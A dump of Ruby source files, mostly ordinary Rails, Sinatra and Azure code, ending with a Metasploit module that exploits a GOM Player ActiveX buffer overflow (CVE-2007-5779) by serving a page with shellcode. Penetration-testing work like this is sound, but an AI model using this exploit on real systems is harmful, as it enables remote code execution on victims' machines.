| 30.70128 | 90 | 0.418802 |
b9c25e89aea30e019a42ac2036775ea765c86b8f | 1,661 | FactoryBot.define do
trait :jmaxml_trigger_base do
cur_site { cms_site }
name { unique_id }
training_status { 'disabled' }
test_status { 'disabled' }
end
factory :jmaxml_trigger_quake_intensity_flash,
class: Jmaxml::Trigger::QuakeIntensityFlash, traits: [:jmaxml_trigger_base] do
earthquake_intensity { '5+' }
end
factory :jmaxml_trigger_quake_info,
class: Jmaxml::Trigger::QuakeInfo, traits: [:jmaxml_trigger_base] do
earthquake_intensity { '5+' }
end
factory :jmaxml_trigger_tsunami_alert,
class: Jmaxml::Trigger::TsunamiAlert, traits: [:jmaxml_trigger_base] do
sub_types { %w(special_alert alert warning) }
end
factory :jmaxml_trigger_tsunami_info,
class: Jmaxml::Trigger::TsunamiInfo, traits: [:jmaxml_trigger_base] do
sub_types { %w(special_alert alert warning) }
end
factory :jmaxml_trigger_weather_alert,
class: Jmaxml::Trigger::WeatherAlert, traits: [:jmaxml_trigger_base] do
sub_types { %w(special_alert alert warning) }
end
factory :jmaxml_trigger_landslide_info,
class: Jmaxml::Trigger::LandslideInfo, traits: [:jmaxml_trigger_base]
factory :jmaxml_trigger_flood_forecast,
class: Jmaxml::Trigger::FloodForecast, traits: [:jmaxml_trigger_base]
factory :jmaxml_trigger_volcano_flash,
class: Jmaxml::Trigger::VolcanoFlash, traits: [:jmaxml_trigger_base]
factory :jmaxml_trigger_ash_fall_forecast,
class: Jmaxml::Trigger::AshFallForecast, traits: [:jmaxml_trigger_base] do
sub_types { %w(flash regular detail) }
end
factory :jmaxml_trigger_tornado_alert,
class: Jmaxml::Trigger::TornadoAlert, traits: [:jmaxml_trigger_base]
end
| 32.568627 | 82 | 0.748946 |
bbdcf5da6e0dc2d8588050e9e9e226213ce84990 | 10,415 | class App < Sinatra::Base
set :public_folder, File.dirname(__FILE__) + '/public'
set :static, true
set :logging, true
set :server, 'thin'
JS_FILES = [
'support/jquery.min.js',
'support/swfobject.js',
'support/web_socket.js',
'support/json2.js',
'support/underscore-min.js',
'support/backbone-min.js',
'support/jquery-ui.js',
'app.js',
'admin.js',
'youtube.js',
'blip.js',
'chat.js',
]
def current_user
@current_user ||= User.find_by_id(session[:user_id]) if session[:user_id]
end
def login_required
if current_user.nil?
if request.xhr?
status 401
else
session[:return_to] = request.path
redirect '/auth'
end
halt
end
end
def render_javascript(files)
return JS_CACHE['core'] if JS_CACHE.has_key?('core')
data = files.map{|f|File.read "#{File.dirname(__FILE__)}/javascripts/#{f}"}
if $production
JS_CACHE['core'] = Uglifier.compile(data.join(';'), {:squeeze => false})
JS_CACHE['core']
else
data
end
end
helpers do
include Rack::Utils
alias_method :h, :escape_html
def partial(page, options={})
erb page, options.merge!(:layout => false)
end
def link_to(name, href, options={})
opts = options.keys.map { |key| "#{key}=\"#{options[key]}\"" }.join(' ')
"<a href=\"#{escape_html(href)}\" #{opts}>#{name}</a>"
end
def get_channels
@channels ||= Channel.all
end
def get_admin_channels
current_user.admin ? get_channels : current_user.admin_channels
end
def public_tabs
get_channels.map do |channel|
{:id => "chan_#{channel.id}".to_sym, :class => 'room', :name => channel.permalink, :href => channel.permalink}
end
end
def admin_tabs
list = [{:id => :"admin", :class => 'admin', :name => 'Admin', :url => '/admin'}]
if current_user.admin
list += [{:id => :"admin_users", :class => 'admin', :name => 'Users', :url => '/admin/users'},
{:id => :"admin_bans", :class => 'admin', :name => 'Bans', :url => '/admin/bans'},
{:id => :"admin_channels", :class => 'admin', :name => 'Channels', :url => '/admin/channels'}]
end
list += get_admin_channels.map do |channel|
{:id => :"chan_#{channel.id}", :class => 'room', :name => channel.permalink, :url => "/admin/channels/#{channel.id}"}
end
list
end
def set_tab(the_tab)
@current_tab = the_tab
end
def get_tabs(list)
current = @current_tab
send(list).map do |tab|
"<li id=\"tab_#{tab[:id]}\" class=\"#{tab[:class]}\"><a href=\"#{tab[:url]}\" #{current == tab[:id] ? 'class="active"' : ''}>#{escape_html tab[:name]}</a></li>"
end.join('')
end
def channel_port(channel)
if APP_CONFIG['single_server']
# Determine from config
APP_CONFIG['websocket_port'] || ENV['PORT']
else
# Determine from channel info
channel.backend_server
end
end
end
get '/' do
@channels = Channel.all
erb :channel_index
end
# Global channel display
get '/r/:id' do
# Display the first channel for now
@channel = Channel.find_by_id(params[:id])
if @channel.nil?
status 404
halt
else
erb :channel
end
end
get '/all.js' do
content_type 'application/javascript'
if $production and JS_CACHE.has_key?('last_all_time')
last_modified(JS_CACHE['last_all_time'])
else
JS_CACHE['last_all_time'] = Time.now.utc
end
render_javascript(JS_FILES)
end
# Login
get '/auth' do
erb :login
end
post '/auth' do
if params[:error]
      erb :error
else
# get token
@current_user = User.authenticate(params[:name], params[:password])
if @current_user
session[:user_id] = @current_user.id
redirect session[:return_to] || '/'
else
erb :error
end
end
end
# Token for socket identification
post '/auth/socket_token' do
data = JSON.parse(request.body.read) rescue {}
if current_user
current_user.generate_auth_token!
content_type :json
{:auth_token => current_user.auth_token}.to_json
else
content_type :json
{:name => session['name']}.to_json
end
end
# Remember nick
post '/auth/name' do
data = JSON.parse(request.body.read) rescue {}
content_type :json
session[:name] = data['name'] if data['name']
{}.to_json
end
# Admin panel
get '/admin*' do
login_required
return status(401) if !current_user.admin
if params[:splat].first =~ /\/?(.*)$/
@subpath = $1[-1] == '/' ? $1[0...-1] : $1
end
erb :admin, :layout => :'admin_layout'
end
# Enumerate connections, videos, ban count, historical figures, etc
get '/stats' do
login_required
return status(401) if !current_user.admin
content_type :json
{
:subscriptions => SUBSCRIPTIONS.stats_enumerate,
:channels => Channel.all.map(&:stats_enumerate)
}.to_json
end
# Get users
get '/users' do
login_required
return status(401) if !current_user.admin
content_type :json
User.all.map{|u| u.to_info(:admin => true)}.to_json
end
# Create a user
post '/users' do
login_required
return status(401) if !current_user.admin
content_type :json
user = User.new(JSON.parse(request.body.read))
user.updated_by = current_user
if user.save
status 201
user.to_info(:admin => true).to_json
else
status 422
{:error => 'InvalidAttributes', :errors => user.errors}.to_json
end
end
# Get user info
get '/users/:id' do
login_required
return status(401) if !current_user.admin and current_user.id != params[:id].to_i
content_type :json
user = User.find_by_id(params[:id])
if user
user.to_info(:admin => true).to_json
else
status 404
{:error => 'NotFound'}.to_json
end
end
# Update a user
put '/users/:id' do
login_required
return status(401) if !current_user.admin and current_user.id != params[:id].to_i
content_type :json
user = User.find_by_id(params[:id])
if user
user.updated_by = current_user
if user.update_attributes(JSON.parse(request.body.read))
user.to_info(:admin => true).to_json
else
status 422
{:error => 'InvalidAttributes', :errors => user.errors}.to_json
end
else
status 404
{:error => 'NotFound'}.to_json
end
end
# Delete a user
delete '/users/:id' do
login_required
return status(401) if !current_user.admin
content_type :json
user = User.find_by_id(params[:id])
if user
if user != current_user && User.all.count > 1
user.destroy
else
status 406
{:error => 'EndOfWorld'}.to_json
end
else
status 404
{:error => 'NotFound'}.to_json
end
end
# Get bans
get '/bans' do
login_required
return status(401) if !current_user.admin
content_type :json
Ban.all.map(&:to_info).to_json
end
# Get a ban
get '/bans/:id' do
login_required
return status(401) if !current_user.admin
content_type :json
ban = Ban.find_by_id(params[:id])
if ban
ban.to_info(:admin => true).to_json
else
status 404
{:error => 'NotFound'}.to_json
end
end
# Update bans
put '/bans/:id' do
login_required
return status(401) if !current_user.admin
content_type :json
ban = Ban.find_by_id(params[:id])
if ban
if ban.update_attributes(JSON.parse(request.body.read))
ban.to_info(:admin => true).to_json
else
status 422
{:error => 'InvalidAttributes', :errors => ban.errors}.to_json
end
else
status 404
{:error => 'NotFound'}.to_json
end
end
# Create a ban
post '/bans' do
login_required
return status(401) if !current_user.admin
content_type :json
ban = Ban.new(JSON.parse(request.body.read))
if ban.save
status 201
ban.to_info(:admin => true).to_json
else
status 422
{:error => 'InvalidAttributes', :errors => ban.errors}.to_json
end
end
# Delete a ban
delete '/bans/:id' do
login_required
return status(401) if !current_user.admin
content_type :json
ban = Ban.find_by_id(params[:id])
if ban
ban.destroy
else
status 404
{:error => 'NotFound'}.to_json
end
end
# Create a channel
post '/channels' do
login_required
return status(401) if !current_user.admin
content_type :json
channel = Channel.new(JSON.parse(request.body.read))
if channel.save
status 201
channel.to_info(:admin => true).to_json
else
status 422
{:error => 'InvalidAttributes', :errors => channel.errors}.to_json
end
end
# List channels
get '/channels' do
login_required
content_type :json
Channel.all.map{|c|c.to_info(:full => true)}.to_json
end
# Get channel info
get '/channels/:id' do
login_required
return status(401) if !current_user.admin
content_type :json
channel = Channel.find_by_id(params[:id])
if channel
channel.to_info(:admin => true).to_json
else
status 404
{:error => 'NotFound'}.to_json
end
end
# Update channel info
put '/channels/:id' do
login_required
return status(401) if !current_user.admin
content_type :json
channel = Channel.find_by_id(params[:id])
if channel and channel.can_admin(current_user)
if channel.update_attributes(JSON.parse(request.body.read))
channel.to_info(:admin => true).to_json
else
status 422
{:error => 'InvalidAttributes', :errors => channel.errors}.to_json
end
else
      status 404
      {:error => 'NotFound'}.to_json
end
end
# Delete a channel
delete '/channels/:id' do
login_required
return status(401) if !current_user.admin
content_type :json
channel = Channel.find_by_id(params[:id])
if channel
channel.destroy
else
status 404
{:error => 'NotFound'}.to_json
end
end
end
| 23.093126 | 168 | 0.597888 |
bb0369eddc43f337c57c34d3762cd2f5a6d31289 | 1,396 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::DevTestLabs::Mgmt::V2018_09_15
module Models
#
# Represents an update resource
#
class UpdateResource
include MsRestAzure
# @return [Hash{String => String}] The tags of the resource.
attr_accessor :tags
#
# Mapper for UpdateResource class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'UpdateResource',
type: {
name: 'Composite',
class_name: 'UpdateResource',
model_properties: {
tags: {
client_side_validation: true,
required: false,
serialized_name: 'tags',
type: {
name: 'Dictionary',
value: {
client_side_validation: true,
required: false,
serialized_name: 'StringElementType',
type: {
name: 'String'
}
}
}
}
}
}
}
end
end
end
end
| 25.851852 | 70 | 0.49212 |
7ac80d3cc0919a17348c45d19e7658072f304130 | 1,759 | Rails.application.configure do
# Settings specified here will take precedence over those in
# config/application.rb.
# The test environment is used exclusively to run your application's
# test suite. You never need to work with it otherwise. Remember that
# your test database is "scratch space" for the test suite and is wiped
# and recreated between test runs. Don't rely on the data there!
config.cache_classes = true
# Do not eager load code on boot. This avoids loading your whole application
# just for the purpose of running a single test. If you are using a tool that
# preloads Rails for running tests, you may have to set it to true.
config.eager_load = false
# Configure static file server for tests with Cache-Control for performance.
config.serve_static_files = true
config.static_cache_control = 'public, max-age=3600'
# Show full error reports and disable caching.
config.consider_all_requests_local = true
config.action_controller.perform_caching = false
# Raise exceptions instead of rendering exception templates.
config.action_dispatch.show_exceptions = false
# Disable request forgery protection in test environment.
config.action_controller.allow_forgery_protection = false
# Tell Action Mailer not to deliver emails to the real world.
# The :test delivery method accumulates sent emails in the
# ActionMailer::Base.deliveries array.
config.action_mailer.delivery_method = :test
# Randomize the order test cases are executed.
config.active_support.test_order = :random
# Print deprecation notices to the stderr.
config.active_support.deprecation = :stderr
# Raises error for missing translations
# config.action_view.raise_on_missing_translations = true
end
| 39.977273 | 79 | 0.773735 |
b9f9242fdeeacd9523031fac18fc6dac3dfc1e93 | 432 | # frozen_string_literal: true
class LikesController < ApplicationController
before_action :set_cart
before_action :dish_params
def create
Like.create(user_id: current_user.id, dish_id: params[:id])
end
def destroy
Like.find_by(user_id: current_user.id, dish_id: params[:id]).destroy
end
private
def dish_params
@dish = Dish.find(params[:id])
end
def set_cart
@cart = current_cart
end
end
| 17.28 | 72 | 0.724537 |
b928e0e4c736d9822758c7a67c776b6049d25ac1 | 75 | require "overkill/version"
module Overkill
# Your code goes here...
end
| 12.5 | 26 | 0.733333 |
11548f238d7b9d1c5482215a3988a34bad693740 | 465 | OpenFarm::Application.configure do
Delayed::Worker.delay_jobs = false
config.cache_classes = false
config.eager_load = false
config.consider_all_requests_local = true
config.action_controller.perform_caching = false
config.action_mailer.raise_delivery_errors = false
config.active_support.deprecation = :log
config.assets.debug = true
config.quiet_assets = true
config.action_mailer.default_url_options = { :host => 'localhost:3000' }
end
| 35.769231 | 74 | 0.780645 |
796a9dfc1cda03f4e629411165a2470c3f605248 | 688 | module FanOut
class InsertAllWithSelectBuilder
attr_reader :attributes, :select_scope, :model, :connection
def initialize(model, attributes, select_scope, connection)
@model = model
@attributes = attributes
@select_scope = select_scope
@connection = connection
end
def into
"INTO #{model.quoted_table_name} (#{columns_list})"
end
def values_list
select_scope.to_sql
end
def returning
nil
end
def skip_duplicates?
true
end
def conflict_target
''
end
private
def columns_list
attributes.map(&connection.method(:quote_column_name)).join(", ")
end
end
end
| 17.641026 | 71 | 0.648256 |
ac47fea7372e9a01e7867800e8f1e8cd605cdf52 | 1,275 | #
# Be sure to run `pod spec lint LaravelEchoIOS.podspec' to ensure this is a
# valid spec and to remove all comments including this before submitting the spec.
#
# To learn more about Podspec attributes see http://docs.cocoapods.org/specification.html
# To see working Podspecs in the CocoaPods repo see https://github.com/CocoaPods/Specs/
#
Pod::Spec.new do |s|
s.name = "LaravelEchoIOS"
s.version = "0.0.3"
s.summary = "A wrapper for Laravel Echo in Swift"
s.description = "A wrapper for Laravel Echo with Socket.io in Swift by bubbleflat.com"
s.homepage = "https://github.com/val-bubbleflat/laravel-echo-ios"
s.license = { :type => "MIT", :file => "LICENSE"}
s.author = { "Valentin Vivies" => "[email protected]", "bubbleflat" => "[email protected]" }
s.source = { :git => "https://github.com/val-bubbleflat/laravel-echo-ios.git", :tag => "#{s.version}" }
s.platforms = {:ios => "9.0"}
s.source_files = "LaravelEchoIOS/*.swift", "LaravelEchoIOS/**/*.swift"
s.exclude_files = ""
s.pod_target_xcconfig = { 'SWIFT_VERSION' => '4.0' }
s.subspec 'Socket.IO-Client-Swift' do |socket|
socket.dependency 'Socket.IO-Client-Swift'
end
#s.framework = "LaravelEchoIOS"
end
| 33.552632 | 111 | 0.661176 |
5da1bed22952ec9b2e590d4ca23fa18d27937e28 | 345 | # frozen_string_literal: true
class ApplicationPolicy
attr_reader :user, :record
def initialize(user, record)
@user = user
@record = record
end
def index?
true
end
def create?
true
end
def new?
create?
end
def update?
true
end
def edit?
update?
end
def destroy?
true
end
end
| 9.857143 | 30 | 0.614493 |
ed395dd5df8497a5e2937568a0f958f8c41e7234 | 643 | require 'spec_helper'
RSpec.describe SuapApi do
it 'should return correct "BASE_URL"' do
expect(SuapApi::BASE_URL).to eq('https://suap.ifms.edu.br')
expect(SuapApi::BASE_URL).not_to be nil
end
it 'should return correct uri "FREQUENCY_OF_DAY"' do
uri = '/api/v2/minhas-informacoes/minhas-frequencias/?format=json'
expect(SuapApi::FREQUENCY_OF_DAY).to eq(uri)
expect(SuapApi::FREQUENCY_OF_DAY).not_to be nil
end
it 'should return correct uri "MY_DATA"' do
uri = '/api/v2/minhas-informacoes/meus-dados/?format=json'
expect(SuapApi::MY_DATA).to eq(uri)
expect(SuapApi::MY_DATA).not_to be nil
end
end
| 30.619048 | 70 | 0.720062 |
0132a7999995d7770f280ae581ef6beb3a958ee2 | 319 | require 'test_helper'
class MainControllerTest < ActionController::TestCase
test "should get create" do
get :create
assert_response :success
end
test "should get list" do
get :list
assert_response :success
end
test "should get view" do
get :view
assert_response :success
end
end
| 15.95 | 53 | 0.705329 |
01570f93c127a3c71e6e5555187313b4fbecd058 | 440 | module Twitter
module Endpoints
module CustomToken
def request
@request
end
def call(env)
@request = Rack::Request.new(env)
response = Simple::OAuth2::Generators::Token.generate_for(env, &:unsupported_grant_type!)
status = response.status
headers = response.headers
body = JSON.generate(response.body)
[status, headers, [body]]
end
end
end
end
| 20 | 97 | 0.613636 |
91228004e2e7a5c12a9aa1653cf215c6e39e653d | 1,986 | # Unlight
# Copyright(c)2019 CPA
# This software is released under the MIT License.
# http://opensource.org/licenses/mit-license.php
module Unlight
# パーツのインベントリクラス
class ItemInventory < Sequel::Model
# 他クラスのアソシエーション
many_to_one :avatar # アバターを持つ
many_to_one :avatar_item # アバターアイテムを持つ
plugin :schema
plugin :validation_class_methods
plugin :hook_class_methods
    # Schema definition
set_schema do
primary_key :id
integer :avatar_id, :index=>true #, :table => :avatars
integer :avatar_item_id#, :table => :avatar_items
integer :state, :default => 0 # ITEM_STATE_NOT_USE
      integer :server_type, :default => 0 # tinyint (changed on the DB side); added 2016/11/24
datetime :use_at
datetime :created_at
datetime :updated_at
end
    # Validation settings
validates do
end
    # Create the table in the DB
if !(ItemInventory.table_exists?)
ItemInventory.create_table
end
    # Alter the table (keeping a record of the change)
    DB.alter_table :item_inventories do
      add_column :server_type, :integer, :default => 0 unless Unlight::ItemInventory.columns.include?(:server_type) # added 2016/11/24
end
    # Pre-processing before insert
before_create do
self.created_at = Time.now.utc
end
    # Pre-processing before insert and update
before_save do
self.updated_at = Time.now.utc
end
    # Handling for when an item is used
def use(avt,quest_map_no=0)
ret = ERROR_ITEM_NOT_EXIST
      # Check the state first: heavy processing runs below, and without this check the item could be used multiple times
if self.state == ITEM_STATE_NOT_USE
if self.avatar_item.duration > 0
          self.state = ITEM_STATE_USING # in use
          self.use_at = Time.now.utc # time of use
        else
          self.state = ITEM_STATE_USED # used
          self.use_at = Time.now.utc # time of use
end
self.save_changes
ret = self.avatar_item.use(avt,quest_map_no)
if ret != 0
          self.state = ITEM_STATE_NOT_USE # revert to unused
self.save_changes
end
end
ret
end
end
end
| 25.139241 | 134 | 0.633938 |
629d3301f03951017626b3d9579c6ed321b61643 | 52 | class MessageController < ApplicationController
end
| 17.333333 | 47 | 0.884615 |
8748e3c6cd5802e000a65bf1f1fa7162ef89f500 | 141 | module Types
class ReferencesType < BaseObject
field :users, [UserType], null: true
field :votes, [VoteType], null: true
end
end
| 20.142857 | 40 | 0.695035 |
1a663cf9afa911558c258872792f5e6dc4a6c3f1 | 174 | require 'test_helper'
class UsersControllerTest < ActionDispatch::IntegrationTest
# test "should get new" do
# get users_new_url
# assert_response :success
# end
end
| 19.333333 | 59 | 0.764368 |
2809f192767619f316d996070cfcba167499375c | 767 | require 'common'
module Sykus; module Hosts
# Gets client host info (printers + roomctl screenlock).
class GetCliInfo < ServiceBase
# @param [IPAddr] ip Client IP.
# @return [Hash] Hash of client info.
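      # @example Illustrative return value (an assumption for documentation only;
      #   actual printer ids/names and lock flags depend on the host's group)
      #   { printers: [{ id: "p3", name: "Laser-Office" }],
      #     screenlock: false, printerlock: false, weblock: false, soundlock: false }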
def run(ip)
host = Host.first(ip: ip)
raise Exceptions::Input, 'Host not found' if host.nil?
printers = host.host_group.printers.map do |printer|
{
id: "p#{printer.id}",
name: printer.name.gsub(' ', '-').gsub('/', '-').gsub('#', '')
}
end
data = { printers: printers }
%w{screenlock printerlock weblock soundlock}.each do |lock|
data[lock.to_sym] =
!!REDIS.get("Roomctl.#{host.host_group.id}.#{lock}")
end
data
end
end
end; end
| 22.558824 | 72 | 0.569752 |
bf2f912e884f82debf181a8a9f8cd4afa4913dcf | 1,814 | require File.expand_path(File.dirname(__FILE__) + '/../example_helper')
describe Astrails::Safe::Archive do
def def_config
{
:options => "OPTS",
:files => "apples",
:exclude => "oranges"
}
end
def archive(id = :foo, config = def_config)
Astrails::Safe::Archive.new(id, Astrails::Safe::Config::Node.new(nil, config))
end
after(:each) { Astrails::Safe::TmpFile.cleanup }
describe :backup do
before(:each) do
@archive = archive
stub(@archive).timestamp {"NOW"}
end
{
:id => "foo",
:kind => "archive",
:extension => ".tar",
:filename => "archive-foo.NOW",
:command => "tar -cf - OPTS --exclude=oranges apples",
}.each do |k, v|
it "should set #{k} to #{v}" do
@archive.backup.send(k).should == v
end
end
end
describe :tar_exclude_files do
it "should return '' when no excludes" do
archive(:foo, {}).send(:tar_exclude_files).should == ''
end
it "should accept single exclude as string" do
archive(:foo, {:exclude => "bar"}).send(:tar_exclude_files).should == '--exclude=bar'
end
it "should accept multiple exclude as array" do
archive(:foo, {:exclude => ["foo", "bar"]}).send(:tar_exclude_files).should == '--exclude=foo --exclude=bar'
end
end
describe :tar_files do
it "should raise RuntimeError when no files" do
lambda {
archive(:foo, {}).send(:tar_files)
}.should raise_error(RuntimeError, "missing files for tar")
end
it "should accept single file as string" do
archive(:foo, {:files => "foo"}).send(:tar_files).should == "foo"
end
it "should accept multiple files as array" do
archive(:foo, {:files => ["foo", "bar"]}).send(:tar_files).should == "foo bar"
end
end
end | 27.074627 | 114 | 0.599228 |
6ae557e508c53beb472dafa6b8e71313811a736a | 693 | require 'rails/generators'
module NeditorRails
module Generators
class InstallGenerator < ::Rails::Generators::Base
source_root File.expand_path("../templates", __FILE__)
desc "This generator installs neditor custom config"
def add_custom_config
if File.exist?("app/assets/javascripts/neditor_custom_config.js")
js = File.read("app/assets/javascripts/neditor_custom_config.js")
insert_into_file "app/assets/javascripts/neditor_custom_config.js", js, :after => "neditor custom config\n"
else
copy_file "neditor_custom_config.js", "app/assets/javascripts/neditor_custom_config.js"
end
end
end
end
end
| 31.5 | 117 | 0.707071 |
8783099728cf9183603d042ed72c3e02bea8c69f | 272 | # frozen_string_literal: true
# Copyright 2015-2017, the Linux Foundation, IDA, and the
# CII Best Practices badge contributors
# SPDX-License-Identifier: MIT
%w[
.ruby-version
.rbenv-vars
tmp/restart.txt
tmp/caching-dev.txt
].each { |path| Spring.watch(path) }
| 20.923077 | 57 | 0.731618 |
11284145690367c02a5b4d7b5ca8f75b803c3026 | 1,483 | # frozen_string_literal: true
require "rails_helper"
RSpec.describe Api::V1::LightCompanySerializer, type: :serializer do
before(:all) {
@company = create :full_company
}
after(:all) {
@company.destroy!
}
before {
@company.reload
}
let(:serializer) { Api::V1::LightCompanySerializer.new(@company) }
let(:serialization) { ActiveModelSerializers::Adapter.create(serializer) }
let(:subject) { JSON.parse(serialization.to_json) }
it "includes the expected attributes" do
expect(subject.keys).to contain_exactly(
"id",
"smooth_name",
"name",
"website_url",
"api_url",
"city",
"country"
)
end
it { expect(subject["id"]).not_to be_nil }
it { expect(subject["name"]).not_to be_nil }
it { expect(subject["smooth_name"]).not_to be_nil }
it { expect(subject["website_url"]).not_to be_nil }
it { expect(subject["api_url"]).not_to be_nil }
it { expect(subject["country"]).not_to be_nil }
it { expect(subject["id"]).to eql(@company.id) }
it { expect(subject["name"]).to eql(@company.name) }
it { expect(subject["smooth_name"]).to eql(@company.smooth_name) }
it { expect(subject["website_url"]).to eql("https://www.companydata.co/companies/#{@company.slug}") }
it { expect(subject["api_url"]).to eql("https://www.companydata.co/api/v1/companies/#{@company.slug}") }
it { expect(subject["city"]).to eql(@company.city) }
it { expect(subject["country"]).to eql(@company.country) }
end
| 31.553191 | 106 | 0.66352 |
1d0cedc36213138da8cecd2b9462d98cd1f40563 | 582 | require 'bundler/setup'
require 'minitest/autorun'
require 'minitest/reporters'
require 'minitest/reporters/mean_time_reporter'
Minitest::Reporters.use! Minitest::Reporters::MeanTimeReporter.new
class TestClass < Minitest::Test
def test_assertion
assert true
end
def test_fail
fail
end
end
class AnotherTestClass < Minitest::Test
def test_assertion
assert true
end
def test_fail
fail
end
end
class LastTestClass < Minitest::Test
def test_assertion
assert true
end
def test_fail
fail
end
end
| 15.72973 | 67 | 0.701031 |
ff1ab14ad9c585f3202b3801d153226528b213f9 | 310 | class JobsController < ApplicationController
def fake
num = params[:num] || 200
num.to_i.times { FakeJob.perform_async }
render text: "#{num} jobs created"
end
def log
num = params[:num] || 200
num.to_i.times { LogJob.perform_async }
render text: "#{num} jobs created"
end
end
| 22.142857 | 44 | 0.654839 |
ab37c282fe57af1eaa62cdc6ad350393fdd54946 | 1,050 | # frozen_string_literal: true
module Types
module PermissionTypes
class Project < BasePermissionType
graphql_name 'ProjectPermissions'
abilities :change_namespace, :change_visibility_level, :rename_project,
:remove_project, :archive_project, :remove_fork_project,
:remove_pages, :read_project, :create_merge_request_in,
:read_wiki, :read_project_member, :create_issue, :upload_file,
:read_cycle_analytics, :download_code, :download_wiki_code,
:fork_project, :create_project_snippet, :read_commit_status,
:request_access, :create_pipeline, :create_pipeline_schedule,
:create_merge_request_from, :create_wiki, :push_code,
:create_deployment, :push_to_delete_protected_branch,
:admin_wiki, :admin_project, :update_pages,
:admin_remote_mirror, :create_label, :update_wiki, :destroy_wiki,
:create_pages, :destroy_pages, :read_pages_content
end
end
end
| 45.652174 | 81 | 0.680952 |
5d592a947bae83d1b176365dfc02fb9e10fcef5f | 239 | # frozen_string_literal: true
require_relative '../options_helper'
describe OctocatalogDiff::Cli::Options do
describe '#opt_truncate_details' do
include_examples 'true/false option', 'truncate-details', :truncate_details
end
end
| 23.9 | 79 | 0.786611 |
ede4fef7e6f48b7eac86adee43dc6aa3e7a10794 | 865 | require_relative '../lib/named_proc'
describe "proc" do
it "creates a new proc as usual when called with a block" do
a = proc{}
expect( a ).to be_instance_of Proc
expect( a ).not_to be_lambda
end
it "creates a named proc when a method gets called on it" do
a = proc.brawl{}
expect( a ).to be_a Proc
expect( a ).to be_instance_of NamedProc
expect( a ).not_to be_lambda
expect( a.name ).to eq :brawl
end
end
describe "lambda" do
it "creates a new lambda as usual when called with a block" do
a = lambda{}
expect( a ).to be_instance_of Proc
expect( a ).to be_lambda
end
it "creates a named lambda when a method gets called on it" do
a = lambda.brawl{}
expect( a ).to be_a Proc
expect( a ).to be_instance_of NamedProc
expect( a ).to be_lambda
expect( a.name ).to eq :brawl
end
end
| 25.441176 | 64 | 0.660116 |
f7bd6949145abbfc7b836adc12aa0f8532dd9a6c | 1,155 | Pod::Spec.new do |s|
s.name = "ISOLogger"
s.version = "0.1"
s.summary = "ISOLogger hides the existing log entries for your app. So you can focus on the ones you just added."
s.description = <<-DESC
Why ISOLogger?
--------------
Other people add log entries with only the best intentions. But sometimes they drown out your own voice.
The most useful entries are the ones you add yourself, right before you run the code.
ISOLogger is a simple tool that sends all existing log output to a file. It's still there if you need it. But your Xcode console is reserved so you can hear yourself think.
For a more detailed explanation, read the [blog post][1].
[1]: http://funroll.co/ "Introducing ISOLogger"
DESC
s.homepage = "https://github.com/funroll/ISOLogger"
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { "Peter Jenkins" => "[email protected]" }
s.source = { :git => "https://github.com/funroll/ISOLogger.git", :tag => "0.1" }
s.source_files = '*.{h,m}'
end
| 41.25 | 182 | 0.593939 |
b96ba76ef1e922f7bbfbd5ad75108de617bc7395 | 1,619 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::CognitiveServices::ContentModerator::V1_0
module Models
#
# Model object.
#
#
class CreateVideoReviewsBodyItemVideoFramesItemReviewerResultTagsItem
include MsRestAzure
# @return [String] Your key parameter.
attr_accessor :key
# @return [String] Your value parameter.
attr_accessor :value
#
# Mapper for
# CreateVideoReviewsBodyItemVideoFramesItemReviewerResultTagsItem class
# as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'CreateVideoReviewsBodyItem_VideoFramesItem_ReviewerResultTagsItem',
type: {
name: 'Composite',
class_name: 'CreateVideoReviewsBodyItemVideoFramesItemReviewerResultTagsItem',
model_properties: {
key: {
client_side_validation: true,
required: false,
serialized_name: 'Key',
type: {
name: 'String'
}
},
value: {
client_side_validation: true,
required: false,
serialized_name: 'Value',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 26.540984 | 95 | 0.56084 |
18714a4909baf212e5bdd58d97e21601e291a020 | 2,611 | ##
# $Id: gom_openurl.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'GOM Player ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in GOM Player 2.1.6.3499.
By sending an overly long string to the "OpenUrl()" method located
in the GomWeb3.dll Control, an attacker may be able to execute
arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2007-5779'],
[ 'OSVDB', '38282'],
[ 'URL', 'http://secunia.com/advisories/27418/' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00\x09\x0a\x0d'\\",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP2 Pro English', { 'Ret' => 0x7e497c7b } ], # 10/29/07
],
'DisclosureDate' => 'Oct 27 2007',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Randomize some things
vname = rand_text_alpha(rand(100) + 1)
strname = rand_text_alpha(rand(100) + 1)
# Set the exploit buffer
sploit = rand_text_english(506) + [target.ret].pack('V')
sploit << p.encoded + rand_text_english(1024 - p.encoded.length)
# Build out the message
content = %Q|
<html>
<object classid='clsid:DC07C721-79E0-4BD4-A89F-C90871946A31' id='#{vname}'></object>
<script language='javascript'>
var #{vname} = document.getElementById('#{vname}');
var #{strname} = new String('#{sploit}');
#{vname}.OpenURL(#{strname});
</script>
</html>
|
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
